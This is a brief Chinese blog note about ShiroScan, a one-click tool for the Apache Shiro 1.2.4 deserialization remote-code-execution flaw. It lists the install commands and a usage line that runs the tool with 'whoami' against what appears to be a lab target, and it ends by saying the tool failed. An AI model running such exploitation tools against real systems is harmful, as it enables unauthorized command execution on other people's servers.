Shiroscan 不好用shiro1.2.4反序列化一键检测工具

refer to: https://github.com/sv3nbeast/ShiroScan

说明上说的是：

Shiro<=1.2.4反序列化，一键检测工具

安装

git clone https://github.com/sv3nbeast/ShiroScan.git

pip3 install -r requirements.txt

使用：

python3 shiro_rce.py "http://eci-2ze49uvu6avpdp1861fd.cloudeci1.ichunqiu.com:8080" "whoami"

结论

不好用。没有拿到shiro漏洞。